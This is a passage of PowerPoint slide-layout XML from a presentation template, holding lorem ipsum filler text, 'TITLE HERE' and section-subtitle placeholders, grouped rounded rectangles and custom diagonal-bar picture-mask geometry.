              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lobortis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dignissim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>consequat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pellentesque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>justo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>neque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non ante ac </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>elementum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>consequat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Interdum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> fames ac ante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ipsum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>primis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>faucibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aliquet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>imperdiet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Suspendisse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultrices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>viverra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>facilisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sapien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tempor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aliquam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> magna. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Proin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sollicitudin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ante id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>imperdiet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rutrum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>varius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>condimentum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pharetra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>blandit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sem.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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6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ree Columns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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="48"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4601613" y="-1231872"/>
            <a:ext cx="10634887" cy="7035124"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7976165" h="5862603">
                <a:moveTo>
                  <a:pt x="7653935" y="2067213"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7770559" y="2067213"/>
                  <a:pt x="7887183" y="2111704"/>
                  <a:pt x="7976165" y="2200685"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8154128" y="2378648"/>
                  <a:pt x="8154128" y="2667183"/>
                  <a:pt x="7976165" y="2845147"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5069879" y="5751433"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4891915" y="5929396"/>
                  <a:pt x="4603380" y="5929396"/>
                  <a:pt x="4425417" y="5751433"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4247454" y="5573470"/>
                  <a:pt x="4247454" y="5284935"/>
                  <a:pt x="4425417" y="5106972"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7331703" y="2200685"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7420685" y="2111704"/>
                  <a:pt x="7537310" y="2067213"/>
                  <a:pt x="7653935" y="2067213"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6544741" y="1630098"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6661367" y="1630098"/>
                  <a:pt x="6777990" y="1674589"/>
                  <a:pt x="6866973" y="1763570"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7044936" y="1941533"/>
                  <a:pt x="7044936" y="2230068"/>
                  <a:pt x="6866973" y="2408032"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3495076" y="5779929"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3317112" y="5957892"/>
                  <a:pt x="3028578" y="5957892"/>
                  <a:pt x="2850614" y="5779929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2672651" y="5601966"/>
                  <a:pt x="2672651" y="5313431"/>
                  <a:pt x="2850614" y="5135467"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6222511" y="1763571"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6311493" y="1674589"/>
                  <a:pt x="6428118" y="1630098"/>
                  <a:pt x="6544741" y="1630098"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6609833" y="11903"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6726458" y="11903"/>
                  <a:pt x="6843082" y="56394"/>
                  <a:pt x="6932064" y="145375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7110027" y="323338"/>
                  <a:pt x="7110027" y="611873"/>
                  <a:pt x="6932064" y="789837"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1992770" y="5729131"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1814807" y="5907094"/>
                  <a:pt x="1526272" y="5907094"/>
                  <a:pt x="1348308" y="5729130"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1170346" y="5551168"/>
                  <a:pt x="1170346" y="5262633"/>
                  <a:pt x="1348309" y="5084670"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6287603" y="145375"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6376584" y="56394"/>
                  <a:pt x="6493209" y="11903"/>
                  <a:pt x="6609833" y="11903"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5515050" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5581109" y="1"/>
                  <a:pt x="5647168" y="25201"/>
                  <a:pt x="5697568" y="75602"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5798370" y="176403"/>
                  <a:pt x="5798370" y="339835"/>
                  <a:pt x="5697568" y="440637"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="365035" y="5773170"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="264233" y="5873972"/>
                  <a:pt x="100801" y="5873972"/>
                  <a:pt x="0" y="5773170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-100802" y="5672369"/>
                  <a:pt x="-100802" y="5508937"/>
                  <a:pt x="0" y="5408135"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5332533" y="75602"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5382934" y="25200"/>
                  <a:pt x="5448992" y="0"/>
                  <a:pt x="5515050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9" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="5793654" y="296271"/>
            <a:ext cx="6294300" cy="653822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838973" y="1958629"/>
            <a:ext cx="4511964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4200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Hairline"/>
                <a:cs typeface="Lato Hairline"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t>TITLE HERE</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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838973" y="2542427"/>
            <a:ext cx="4511964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smtClean="0"/>
              <a:t>Break </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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859434" y="2975003"/>
            <a:ext cx="4488039" cy="153686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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="144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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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3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4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4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 animBg="1"/>
      <p:bldP spid="20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20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hree Columns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sz="quarter" idx="48"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3304233" y="563719"/>
            <a:ext cx="9242753" cy="7509636"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6932065" h="6258030">
                <a:moveTo>
                  <a:pt x="6544742" y="2108199"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6661367" y="2108199"/>
                  <a:pt x="6777992" y="2152691"/>
                  <a:pt x="6866974" y="2241671"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7044937" y="2419635"/>
                  <a:pt x="7044937" y="2708170"/>
                  <a:pt x="6866974" y="2886133"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3495076" y="6258030"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3317113" y="6435994"/>
                  <a:pt x="3028578" y="6435994"/>
                  <a:pt x="2850615" y="6258030"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2672652" y="6080067"/>
                  <a:pt x="2672652" y="5791532"/>
                  <a:pt x="2850615" y="5613569"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6222513" y="2241671"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6311494" y="2152690"/>
                  <a:pt x="6428118" y="2108199"/>
                  <a:pt x="6544742" y="2108199"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6609834" y="490004"/>
                </a:moveTo>
                <a:cubicBezTo>
